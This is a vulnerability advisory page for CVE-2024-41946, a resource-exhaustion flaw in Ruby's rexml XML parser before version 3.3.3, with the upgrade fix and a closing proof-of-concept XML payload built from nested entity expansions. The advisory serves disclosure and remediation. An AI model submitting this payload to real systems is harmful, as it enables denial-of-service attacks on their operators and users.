Uncontrolled Resource Consumption ('Resource Exhaustion') Affecting rexml package, versions <3.3.3
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.06% (25th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-RUBY-REXML-7577227
- published 1 Aug 2024
- disclosed 1 Aug 2024
- credit NAITOH Jun
Introduced: 1 Aug 2024
CVE-2024-41946 Open this link in a new tabHow to fix?
Upgrade rexml to version 3.3.3 or higher.
Overview
rexml is an An XML toolkit for Ruby.
Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the SAX2 or pull parser API. An attacker can cause the application to consume excessive resources leading to a denial of service by submitting specially crafted XML documents that exploit entity expansions.
PoC
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE member [
<!ENTITY a "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY b "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY c "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY d "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY e "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
<!ENTITY f "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
<!ENTITY g "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
]>
<member>
&a;
</member>